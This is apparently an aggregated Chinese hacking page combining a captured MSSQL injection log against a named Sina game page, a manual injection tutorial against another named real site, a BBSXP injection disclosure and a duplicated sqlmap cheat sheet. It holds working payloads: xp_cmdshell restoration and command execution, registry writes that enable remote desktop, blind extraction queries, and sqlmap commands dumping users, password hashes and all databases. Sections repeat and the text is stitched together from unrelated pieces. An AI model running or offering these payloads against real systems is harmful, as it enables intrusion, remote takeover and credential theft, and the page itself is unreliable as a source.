下面就是小编给大家带来的hdsi2.0 sql注入部分抓包分析语句脚本安全(共含5篇),希望大家喜欢阅读!同时,但愿您也能像本文投稿人“wanglinqu123”一样,积极向本站投稿分享好文章。
恢复cmd
;insert tb1 exec master..xp_cmdshell'net user '--
;exec master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll'--
执行命令:
sql: ;ipconfig -all--
dos:
;Drop table comd_list ;CREATE TABLE comd_list (ComResult nvarchar(1000)) INSERT comd_list EXEC MASTER..xp_cmdshell
“ipconfig
-all”--
GET /plaza/event/new/crnt_event_view.asp?event_id=57
And (Select char(94)+Cast(Count(1) as varchar(8000))+char(94) From [comd_list] Where 1=1)>0
列目录:
c: jiaozhu 临时表
;drop table jiaozhu;CREATE TABLE jiaozhu(DirName VARCHAR(100), DirAtt VARCHAR(100),DirFile VARCHAR(100)) INSERT jiaozhu
EXEC
MASTER..XP_dirtree “c:”,1,1--
GET /plaza/event/new/crnt_event_view.asp?event_id=57
And (Select char(94)+Cast(Count(1) as varchar(8000))+char(94) From [jiaozhu] Where 1=1)>0
上传文件:
本地路径:C:\Inetpub\wwwroot\cook.txt 保存位置:c:
数据库存储过程:
;exec master..xp_cmdshell ' echo
cdb_sid=3UrzOV;%20cdb_cookietime=259;%20cdb_auth=VgcCBAJbVQxVAVMCVghTBFJUUQYDBQdTV1BWVQoKAQE6PwNX;%
20cdb_visitedfid=12;%2
0cdb_oldtopics=D8D>c:\'--
数据库备份:(上传后删除临时表)
;Drop table [xiaopan];create table [dbo].[xiaopan] ([cmd] [text])--
;insert into xiaopan(cmd) values(' echoStr ')--
;declare @a sysname,@s nvarchar(4000) select @a=db_name,@s='c:/' backup database @a to disk=@s WITH
DIFFERENTIAL,FORMAT--
;Drop table [xiaopan]--
开启3389:
;declare @r varchar(255) set @r='hkey_local_machine'exec master..xp_regwrite
@r,'software\microsoft\windows\currentversion\netcache','enable','reg_sz','0';-
---
;declare @r varchar(255) set @r='hkey_local_machine'exec master..xp_regwrite @r,'software\microsoft\windows
nt\currentversion\winlogon','shutdownwithoutlogon','reg_sz','0';----
;declare @r varchar(255) set @r='hkey_local_machine'exec master..xp_regwrite
@r,'software\policies\microsoft\windows\installer','enableadmintsremote','reg_dword',1;----
;declare @r varchar(255) set @r='hkey_local_machine'exec master..xp_regwrite @r,'system\currentcontrolset\control
\terminal
servert','senabled','reg_dword',1;----
;declare @r varchar(255) set @r='hkey_local_machine'exec master..xp_regwrite
@r,'system\currentcontrolset\services\termdd','start','reg_dword',2;----
;declare @r varchar(255) set @r='hkey_local_machine'exec master..xp_regwrite
@r,'system\currentcontrolset\services\termservice','start','reg_dword',2;----
;declare @r varchar(255) set @r='hkey_local_machine'exec master..xp_regwrite 'hkey_users','.default\keyboard
layout\toggle','hotkey','reg_sz','1';----
;declare @r varchar(255) set @r='hkey_local_machine'exec master..xp_cmdshell 'iisreset /reboot';----
注入分析:数字型 SQL错误提示关闭 开启 access
使用关键字 宝石公园“你玩 我抽”中奖名单公布
igame.sina.com.cn/plaza/event/new/crnt_event_view.asp?event_id=57
多句查询 支持
子查询 支持
权限 public
当前用户 dbo
当前库 event
;create table t_jiaozhu(jiaozhu varchar(200))
And 1=1
And 1=2
And (Select Count(1) from SYSObjects)>0
and (select len(user))<32
;declare @a int--
And (IS_SRVROLEMEMBER('sysadmin'))=1
And (IS_MEMBER('db_owner'))=1
and (select len(user))<16
and (select len(user))<4
and (select len(user))<2
and (select len(user))<3
and (select len(user))<3
and (select len(user))<4
and (select ascii(substring(user,1,1)))<80
and (select ascii(substring(user,2,1)))<80
and (select ascii(substring(user,3,1)))<80
and (select ascii(substring(user,1,1)))<104
and (select ascii(substring(user,2,1)))<104
and (select ascii(substring(user,3,1)))<104
and (select ascii(substring(user,1,1)))<92
and (select ascii(substring(user,2,1)))<92
and (select ascii(substring(user,3,1)))<116
and (select ascii(substring(user,1,1)))<98
...
...
...
and (select len(db_name()))<16
and (select len(db_name()))<8
and (select len(db_name()))<4
...
...
...
and (select ascii(substring(db_name(),1,1)))<80
and (select ascii(substring(db_name(),2,1)))<80
and (select ascii(substring(db_name(),5,1)))<85
跨库:
猜解数据库:
GET
and (Select top 1 len(name) from (Select top 2 dbid,name from [master]..[sysdatabases] ) T order by dbid desc) <8
and (Select top 1 len(name) from (Select top 2 dbid,name from [master]..[sysdatabases] ) T order by dbid desc) <4
and (Select top 1 len(name) from (Select top 2 dbid,name from [master]..[sysdatabases] ) T order by dbid desc) <6
and (Select top 1 len(name) from (Select top 2 dbid,name from [master]..[sysdatabases] ) T order by dbid desc) <7
...
...
...
and (Select top 1 ascii(substring(name,2,1)) from (Select top 2 dbid,name from [master]..[sysdatabases] ) T order by
dbid
desc) <104
and (Select top 1 ascii(substring(name,3,1)) from (Select top 2 dbid,name from [master]..[sysdatabases] ) T order by
dbid
desc) <104
...
...
...
and (Select top 1 len(name) from (Select top 4 dbid,name from [master]..[sysdatabases] ) T order by dbid desc) <5
master 不是sa权限,不能跨库
猜解表名:
EventCategory
GET
and (Select top 1 unicode(substring(name,2,1)) from(Select top 1 id,name from [EVENT]..sysobjects where xtype=char(85))
T
order by id desc) < 80
and (Select top 1 unicode(substring(name,11,1)) from(Select top 1 id,name from [EVENT]..sysobjects where xtype=char
(85)) T
order by id desc) < 80
and (Select top 1 unicode(substring(name,12,1)) from(Select top 1 id,name from [EVENT]..sysobjects where xtype=char
(85)) T
order by id desc) < 80
and (Select top 1 unicode(substring(name,6,1)) from(Select top 1 id,name from [EVENT]..sysobjects where xtype=char(85))
T
order by id desc) < 80
猜解列名:
GET
and (select count(1) from EVENT..syscolumns A,EVENT..sysobjects B where A.id=B.id and B.name='EventCategory')<32
and (select count(1) from EVENT..syscolumns A,EVENT..sysobjects B where A.id=B.id and B.name='EventCategory')<48
and (select count(1) from EVENT..syscolumns A,EVENT..sysobjects B where A.id=B.id and B.name='EventCategory')<56
and (select count(1) from EVENT..syscolumns A,EVENT..sysobjects B where A.id=B.id and B.name='EventCategory')<60
and (select count(1) from EVENT..syscolumns A,EVENT..sysobjects B where A.id=B.id and B.name='EventCategory')<62
and (select top 1 len(name) from ( select top 1 A.id,A.name from EVENT..syscolumns A,EVENT..sysobjects B where
A.id=B.id and
B.name='EventCategory' order by A.name desc) T order by name asc )<35
hdsi2.0 sql注入部分抓包分析语句如下:
恢复cmd
;insert tb1 exec master..xp_cmdshell'net user '--
;exec master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll'--
执行命令:
sql: ;ipconfig -all--
dos:
;Drop table comd_list ;Create TABLE comd_list (ComResult nvarchar(1000)) Insert comd_list EXEC MASTER..xp_cmdshell
“ipconfig
-all”--
GET /plaza/event/new/crnt_event_view.asp?event_id=57
And (Select char(94)+Cast(Count(1) as varchar(8000))+char(94) From [comd_list] Where 1=1)>0
列目录:
c: jiaozhu 临时表
;drop table jiaozhu;Create TABLE jiaozhu(DirName VARCHAR(100), DirAtt VARCHAR(100),DirFile VARCHAR(100)) Insert jiaozhu
EXEC
MASTER..XP_dirtree “c:”,1,1--
GET /plaza/event/new/crnt_event_view.asp?event_id=57
And (Select char(94)+Cast(Count(1) as varchar(8000))+char(94) From [jiaozhu] Where 1=1)>0
上传文件:
本地路径:C:\Inetpub\wwwroot\cook.txt 保存位置:c:
数据库存储过程:
;exec master..xp_cmdshell ' echo
cdb_sid=3UrzOV;%20cdb_cookietime=2592000;%20cdb_auth=VgcCBAJbVQxVAVMCVghTBFJUUQYDBQdTV1BWVQoKAQE6PwNX;%
20cdb_visitedfid=12;%2
0cdb_oldtopics=D8D>c:\'--
数据库备份:(上传后删除临时表)
;Drop table [xiaopan];create table [dbo].[xiaopan] ([cmd] [text])--
;insert into xiaopan(cmd) values(' echoStr ')--
;declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s='c:/' backup database @a to disk=@s WITH
DIFFERENTIAL,FORMAT--
;Drop table [xiaopan]--
开启3389:
;declare @r varchar(255) set @r='hkey_local_machine'exec master..xp_regwrite
@r,'software\microsoft\windows\currentversion\netcache','enable','reg_sz','0';-
---
;declare @r varchar(255) set @r='hkey_local_machine'exec master..xp_regwrite @r,'software\microsoft\windows
nt\currentversion\winlogon','shutdownwithoutlogon','reg_sz','0';----
;declare @r varchar(255) set @r='hkey_local_machine'exec master..xp_regwrite
@r,'software\policies\microsoft\windows\installer','enableadmintsremote','reg_dword',1;----
;declare @r varchar(255) set @r='hkey_local_machine'exec master..xp_regwrite @r,'system\currentcontrolset\control
\terminal
servert','senabled','reg_dword',1;----
;declare @r varchar(255) set @r='hkey_local_machine'exec master..xp_regwrite
@r,'system\currentcontrolset\services\termdd','start','reg_dword',2;----
;declare @r varchar(255) set @r='hkey_local_machine'exec master..xp_regwrite
@r,'system\currentcontrolset\services\termservice','start','reg_dword',2;----
;declare @r varchar(255) set @r='hkey_local_machine'exec master..xp_regwrite 'hkey_users','.default\keyboard
layout\toggle','hotkey','reg_sz','1';----
;declare @r varchar(255) set @r='hkey_local_machine'exec master..xp_cmdshell 'iisreset /reboot';----
注入分析:数字型 SQL错误提示关闭 开启 access
多句查询 支持
子查询 支持
权限 public
当前用户 dbo
当前库 event
;create table t_jiaozhu(jiaozhu varchar(200))
And 1=1
And 1=2
And (Select Count(1) from SYSObjects)>0
and (select len(user))<32
;declare @a int--
And (IS_SRVROLEMEMBER('sysadmin'))=1
And (IS_MEMBER('db_owner'))=1
and (select len(user))<16
and (select len(user))<4
and (select len(user))<2
and (select len(user))<3
and (select len(user))<3
and (select len(user))<4
and (select ascii(substring(user,1,1)))<80
and (select ascii(substring(user,2,1)))<80
and (select ascii(substring(user,3,1)))<80
and (select ascii(substring(user,1,1)))<104
and (select ascii(substring(user,2,1)))<104
and (select ascii(substring(user,3,1)))<104
and (select ascii(substring(user,1,1)))<92
and (select ascii(substring(user,2,1)))<92
and (select ascii(substring(user,3,1)))<116
and (select ascii(substring(user,1,1)))<98
...
...
...
and (select len(db_name()))<16
and (select len(db_name()))<8
and (select len(db_name()))<4
...
...
...
and (select ascii(substring(db_name(),1,1)))<80
and (select ascii(substring(db_name(),2,1)))<80
and (select ascii(substring(db_name(),5,1)))<85
跨库:
现在注入工具横行,自动化的程度已经...不能再自动了.
很多人会熟练的使用啊D,明小子之类的自动注入工具.以为自己就会了...
注入的原理呢.什么是注入.为什么会造成注入.过程...等.
你知道吗?你有没有试过真正的手工注入?没吧.
现在就利用我写的手工注入工具来讲解一下总体手工注入过程.
先找个有注入漏洞的站.很简单满大街都是.
www.jinhu168.com/A3/NewsInfo.asp?id=75
manage_User
username admin
password bfpms
id 35
已经找好了.这是一个标准欠黑型网站.安全度就不用说了.
www.jinhu168.com/A3/NewsInfo.asp?id=75
有注入漏洞的地址.检查一下.
基本确定可能有漏洞.继续.
www.jinhu168.com/A3/NewsInfo.asp?id=75 and exists (select * from manage_User)
查询manage_User这个表名是否存在.
不好意思.这工具老出错...录制这个工具不怎么好用.有好用的有空介绍个啊....
好了继续.
manage_User 存在...页面返回正常...
名字改了下`不存在就返回错误的页面`
这里是给你填写提示语句用的`不用的话清空就行了.
继续.
返回正常.说明存在.继续.等等`听电话`
不好意思.
不是1位哦`回显错误.呵呵`5位的`回显正常`
这样我们就知道 他很多东西了`表..项..还有内容长度.
帐号的第一位的第一个字母不是1所以出错.
呵呵`帐号的第一位的第一个字母是a 正确...所以回显正常.
帐号是什么我想都不用怎么想了吧`5位数的admin
确实是的哦....哈哈.
www.jinhu168.com/A3/NewsInfo.asp?id=75 and 1=(select count(*) from [manage_User] where left(username,5)='admin')
为了给大家学习.我把例句都提取出来了.和程序过程是一样的,大家可以研究下.
其他的密码等也是这种过程. 大家明白了吗?要难不是很难`只是要有耐心.如果简单的话就不会出现
全自动的注入工具了.
希望大家在使用我的工具的同时也能学到点东西.
By:sobiny[B.C.T]
提交给BBSXP的漏洞公告,官方一点反映都没呢,。
其实主要是他们一个类型的注入太多了。
我都不好意思发出来,发多了手痛。
哎,举例一个。
Search.asp文件
127.0.0.1/Search.asp?menu=Result&ForumID=1&Keywords=aaaaa&Item=ThreadID&DateComparer=365&SortBy=Desc/**/union&VerifyCode=8149
if Request(“menu”)=“Result” then
Keywords=HTMLEncode(Request(“Keywords”))
SortBy=HTMLEncode(Request(“SortBy”))
Item=HTMLEncode(Request(“Item”))
if Keywords=“” then error(“您没有输入任何查询条件!”)
if Request(“VerifyCode”)Session(“VerifyCode”) or Session(“VerifyCode”)=“” then
error(“验证码错误!”)
SQLSearch=“IsApproved=1 and IsDel=0 and ”&Item&“ like '%”&Keywords&“%' ”
if DateComparer >0 then SQLSearch=SQLSearch&“ and
PostTime>”&SqlNowString&“-”&DateComparer&“ ”
if ForumID >0 then SQLSearch=SQLSearch&“ and ForumID=”&ForumID&“ ”
sql=“select * from [BBSXP_Threads] where ”&SQLSearch&“ order by ThreadID
”&SortBy&“”
Rs.Open sql,Conn,1
……………………
我汗死,一个语句中,有两个地方可以注入,BBSXP简直太有才了,
。
他们不把这类型的漏洞补了
我还真不准备看了,太多了,BUG。
工具提供sqlmap0.9版本、、
获取数据库名
./sqlmap.py -u “www.xx.php?nid=14550″
–user-agent “Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0;
.NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR
3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)” –dbs
获取表名
./sqlmap.py -u “www.xxx.php?nid=14550″
–user-agent “Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0;
.NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR
3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)” -D database
–tables
获取列名
./sqlmap.py -u “www.xxx.php?nid=14550″
–user-agent “Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0;
.NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR
3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)” -D database -T
cdb_adminactions –columns
获取值
./sqlmap.py -u “www.xxx.php?nid=14550″
–user-agent “Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0;
.NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR
3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)” -D database -T
cdb_members -C username,password –dump
svn checkout svn.sqlmap.org/sqlmap/trunk/sqlmap
sqlmap-dev
sqlmap.py -u “www.islamichina.com/hotelinchina.asp?cityid=2&m=1″
-v 1 –sql-shell //执行SQL语句
sqlmap.py -u “www.islamichina.com/hotelinchina.asp?cityid=2&m=1″
-v 5 //更详细的信息
load options from a configuration INI file
sqlmap -c
sqlmap.conf
使用POST方法提交
sqlmap.py -u “www.myhack58.com/sqlmap/oracle/post_int.php”
–method POST –data “id=1″
使用COOKIES方式提交,cookie的值用;分割,可以使用TamperData来抓cookies
python sqlmap.py -u “www.myhack58.com/sqlmap/mssql/cookie_int.php”
–cookie “id=1″ -v 1
使用referer欺骗
python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1″
–referer “www.google.com” -v 3
使用自定义user-agent,或者使用随机使用自带的user-agents.txt
python sqlmap.py -u “www.myhack58.com/sqlmap/oracle/get_int.php?id=1″
–user-agent “Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)” -v
3
python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int.php?id=1″
-v 1 -a “./txt/user-agents.txt”
使用基本认证
python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/basic/get_int.php?id=1″
–auth-type Basic –auth-cred “testuser:testpass” -v 3
使用Digest认证
python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/digest/get_int.php?id=1″
–auth-type Digest –auth-cred “testuser:testpass” -v 3
使用代理,配合TOR
python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1″
–proxy “192.168.1.47:3128″
python
sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1″
–proxy “192.168.1.47:8118″
使用多线程猜解
python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int.php?id=1″
-v 1 –current-user –threads 3
绕过动态检测,直接指定有注入点的参数,可以使用,分割多个参数,指定user-agent注入
python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1″
-v 1 -p “id
python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1&cat=2″
-v 1 -p “cat,id”
python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/ua_str.php”
-v 1 -p “user-agent” –user-agent “sqlmap/0.7rc1 (sqlmap.sourceforge.net)”
指定数据库,绕过SQLMAP的自动检测
python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1″
-v 2 –dbms “PostgreSQL”
* MySQL
* oracle
* PostgreSQL
*
Microsoft SQL Server
指定操作系统,绕过SQLMAP自动检测
python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1″
-v 2 –os “Windows”
* Linux
* Windows
自定义payload
Options:
–prefix and –postfix
In some circumstances the vulnerable parameter is
exploitable only if the user provides a postfix to be appended to the injection
payload. Another scenario where these options come handy presents itself when
the user already knows that query syntax and want to detect and exploit the SQL
injection by directly providing a injection payload prefix and/or
postfix.
Example on a MySQL 5.0.67 target on a page where the SQL query
is: $query = “Select * FROM users Where id=(‘” . $_GET['id'] . “‘) LIMIT 0,
1″;:
$ python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_str_brackets.php?id=1″
-v 3 -p “id” –prefix “‘” –postfix “AND
‘test’='test”
[...]
[hh:mm:16] [INFO] testing sql injection on GET
parameter ‘id’ with 0 parenthesis
[hh:mm:16] [INFO] testing custom injection
on GET parameter ‘id’
[hh:mm:16] [TRAFFIC OUT] HTTP request:
GET
/sqlmap/mysql/get_str_brackets.php?id=1%27%29%20AND%207433=7433%20AND%20
%28%27test%27=%27test
HTTP/1.1
Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
Host:
www.myhack58.com:80
Accept-language: en-us,en;q=0.5
Accept:
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,
image/png,*/*;q=0.5
User-agent:
sqlmap/0.7rc1 (sqlmap.sourceforge.net)
Connection:
close
[...]
[hh:mm:17] [INFO] GET parameter ‘id’ is custom
injectable
[...]
As you can see, the injection payload for testing for
custom injection
is:
id=1%27%29%20AND%207433=7433%20AND%20%28%27test%27=%27test
which
URL decoded is:
id=1′) AND 7433=7433 AND (‘test’='test
and makes
the query syntatically correct to the page query:
Select * FROM users
Where id=(’1′) AND 7433=7433 AND (‘test’='test’) LIMIT 0, 1
In this
simple example, sqlmap could detect the SQL injection and exploit it without
need to provide a custom injection payload, but sometimes in the real world
application it is necessary to provide it.
页面比较
python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int_refresh.php?id=1″
–string “luther” -v 1
python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int_refresh.php?id=1″
–regexp “ lu[w][w]er” -v
排除网站的内容
python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int_refresh.php?id=1″
–excl-reg “Dynamic content: ([d]+)”
多语句测试,php内嵌函数mysql_query(),不支持多语句
python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int.php?id=1″
–stacked-test -v 1
union注入测试
python sqlmap.py -u “www.myhack58.com/sqlmap/oracle/get_int.php?id=1″
–union-test -v 1
unionz注入配合orderby
python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_str.php?id=1″
–union-test –union-tech orderby -v 1
python sqlmap.py -u “www.myhack58.com/sqlmap/mssql/get_int.php?id=1″
-v 1 –union-use –banner
python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int.php?id=1″
-v 5 –union-use –current-user
python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int_partialunion.php?id=1″
-v 1 –union-use –dbs
fingerprint
python sqlmap.py -u “www.myhack58.com/sqlmap/mssql/get_int.php?id=1″
-v 1 -f
python sqlmap.py -u “192.168.123.36/sqlmap/get_str.asp?name=luther”
-v 1 -f -b
判断当前用户是否是dba
python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1″
–is-dba -v 1
列举数据库用户
python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1″
–users -v 0
列举数据库用户密码
python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int.php?id=1″
–passwords -v 0
python sqlmap.py -u “www.myhack58.com/sqlmap/mssql/get_int.php?id=1″
–passwords -U sa -v 0
查看用户权限
python sqlmap.py -u “www.myhack58.com/sqlmap/oracle/get_int.php?id=1″
–privileges -v 0
python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1″
–privileges -U postgres -v 0
列数据库
python sqlmap.py -u “www.myhack58.com/sqlmap/mssql/get_int.php?id=1″
–dbs -v 0
列出指定数据库指定表的列名
python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int.php?id=1″
–columns -T users -D test -v 1
列出指定数据库的指定表的指定列的内容
python sqlmap.py -u “www.myhack58.com/sqlmap/mssql/get_int.php?id=1″
–dump -T users -D master -C surname -v 0
指定列的范围从2-4
python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int.php?id=1″
–dump -T users -D test –start 2 –stop 4 -v 0
导出所有数据库,所有表的内容
python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int.php?id=1″
–dump-all -v 0
只列出用户自己新建的数据库和表的内容
python sqlmap.py -u “www.myhack58.com/sqlmap/mssql/get_int.php?id=1″
–dump-all –exclude-sysdbs -v 0
sql query
python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1″
–sql-query “Select usename FROM pg_user” -v 0
python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int.php?id=1″
–sql-query “Select host, password FROM mysql.user LIMIT 1, 3″ -v
1
Select usename, passwd FROM pg_shadow orDER BY usename
保存和恢复会话
python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1″
-b -v 1 -s “sqlmap.log”
保存选项到INC配置文件
python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1″
-b -v 1 –save
获取数据库名:
./sqlmap.py -u “www.xx.php?nid=14550” --user-agent “Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)” --dbs
获取表名:
./sqlmap.py -u “www.xxx.php?nid=14550” --user-agent “Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)” -D database --tables
获取列名
./sqlmap.py -u “www.xxx.php?nid=14550” --user-agent “Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)” -D database -T cdb_adminactions --columns
获取值
./sqlmap.py -u “www.xxx.php?nid=14550” --user-agent “Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)” -D database -T cdb_members -C username,password --dump
更新
svn checkout svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev
sqlmap.py -u “www.islamichina.com/hotelinchina.asp?cityid=2&m=1” -v 1 --sql-shell //执行SQL语句
sqlmap.py -u “www.islamichina.com/hotelinchina.asp?cityid=2&m=1” -v 5 //更详细的信息
load options from a configuration INI file
sqlmap -c sqlmap.conf
使用POST方法提交
sqlmap.py -u “www.myhack58.com/sqlmap/oracle/post_int.php” --method POST --data “id=1”
使用COOKIES方式提交,cookie的值用;分割,可以使用TamperData来抓cookies
python sqlmap.py -u “www.myhack58.com/sqlmap/mssql/cookie_int.php” --cookie “id=1” -v 1
使用referer欺骗
python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1” --referer “www.google.com” -v 3
使用自定义user-agent,或者使用随机使用自带的user-agents.txt
python sqlmap.py -u “www.myhack58.com/sqlmap/oracle/get_int.php?id=1” --user-agent “Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)” -v 3
python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int.php?id=1” -v 1 -a “./txt/user-agents.txt”
使用基本认证
python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/basic/get_int.php?id=1” --auth-type Basic --auth-cred “testuser:testpass” -v 3
使用Digest认证
python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/digest/get_int.php?id=1” --auth-type Digest --auth-cred “testuser:testpass” -v 3
使用代理,配合TOR
python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1” --proxy “192.168.1.47:3128”
python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1” --proxy “192.168.1.47:8118”
使用多线程猜解
python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int.php?id=1” -v 1 --current-user --threads 3
绕过动态检测,直接指定有注入点的参数,可以使用,分割多个参数,指定user-agent注入
python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1” -v 1 -p “id
python sqlmap.py -u ”www.myhack58.com/sqlmap/pgsql/get_int.php?id=1&cat=2“ -v 1 -p ”cat,id“
python sqlmap.py -u ”www.myhack58.com/sqlmap/mysql/ua_str.php“ -v 1 -p ”user-agent“ --user-agent ”sqlmap/0.7rc1 (sqlmap.sourceforge.net)“
指定数据库,绕过SQLMAP的自动检测
python sqlmap.py -u ”www.myhack58.com/sqlmap/pgsql/get_int.php?id=1“ -v 2 --dbms ”PostgreSQL“
* MySQL
* oracle
* PostgreSQL
* Microsoft SQL Server
指定操作系统,绕过SQLMAP自动检测
python sqlmap.py -u ”www.myhack58.com/sqlmap/pgsql/get_int.php?id=1“ -v 2 --os ”Windows“
* Linux
* Windows
自定义payload
Options: --prefix and --postfix
In some circumstances the vulnerable parameter is exploitable only if the user provides a postfix to be appended to the injection payload. Another scenario where these options come handy presents itself when the user already knows that query syntax and want to detect and exploit the SQL injection by directly providing a injection payload prefix and/or postfix.
Example on a MySQL 5.0.67 target on a page where the SQL query is: $query = ”Select * FROM users Where id=('“ . $_GET['id'] . ”') LIMIT 0, 1“;:
$ python sqlmap.py -u ”www.myhack58.com/sqlmap/mysql/get_str_brackets.php?id=1“ -v 3 -p ”id“ --prefix ”'“ --postfix ”AND 'test'='test“
[...]
[hh:mm:16] [INFO] testing sql injection on GET parameter 'id' with 0 parenthesis
[hh:mm:16] [INFO] testing custom injection on GET parameter 'id'
[hh:mm:16] [TRAFFIC OUT] HTTP request:
GET /sqlmap/mysql/get_str_brackets.php?id=1%27%29%20AND%207433=7433%20AND%20
%28%27test%27=%27test HTTP/1.1
Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
Host: www.myhack58.com:80
Accept-language: en-us,en;q=0.5
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,
image/png,*/*;q=0.5
User-agent: sqlmap/0.7rc1 (sqlmap.sourceforge.net)
Connection: close
[...]
[hh:mm:17] [INFO] GET parameter 'id' is custom injectable
[...]
As you can see, the injection payload for testing for custom injection is:
id=1%27%29%20AND%207433=7433%20AND%20%28%27test%27=%27test
which URL decoded is:
id=1') AND 7433=7433 AND ('test'='test
and makes the query syntatically correct to the page query:
Select * FROM users Where id=('1') AND 7433=7433 AND ('test'='test') LIMIT 0, 1
In this simple example, sqlmap could detect the SQL injection and exploit it without need to provide a custom injection payload, but sometimes in the real world application it is necessary to provide it.
页面比较
python sqlmap.py -u ”www.myhack58.com/sqlmap/mysql/get_int_refresh.php?id=1“ --string ”luther“ -v 1
python sqlmap.py -u ”www.myhack58.com/sqlmap/mysql/get_int_refresh.php?id=1“ --regexp ”lu[w][w]er“ -v
排除网站的内容
python sqlmap.py -u ”www.myhack58.com/sqlmap/mysql/get_int_refresh.php?id=1“ --excl-reg ”Dynamic content: ([d]+)“
多语句测试,php内嵌函数mysql_query(),不支持多语句
python sqlmap.py -u ”www.myhack58.com/sqlmap/mysql/get_int.php?id=1“ --stacked-test -v 1
union注入测试
python sqlmap.py -u ”www.myhack58.com/sqlmap/oracle/get_int.php?id=1“ --union-test -v 1
unionz注入配合orderby
python sqlmap.py -u ”www.myhack58.com/sqlmap/pgsql/get_str.php?id=1“ --union-test --union-tech orderby -v 1
python sqlmap.py -u ”www.myhack58.com/sqlmap/mssql/get_int.php?id=1“ -v 1 --union-use --banner
python sqlmap.py -u ”www.myhack58.com/sqlmap/mysql/get_int.php?id=1“ -v 5 --union-use --current-user
python sqlmap.py -u ”www.myhack58.com/sqlmap/mysql/get_int_partialunion.php?id=1“ -v 1 --union-use --dbs
fingerprint
python sqlmap.py -u ”www.myhack58.com/sqlmap/mssql/get_int.php?id=1“ -v 1 -f
python sqlmap.py -u ”192.168.123.36/sqlmap/get_str.asp?name=luther“ -v 1 -f -b
判断当前用户是否是dba
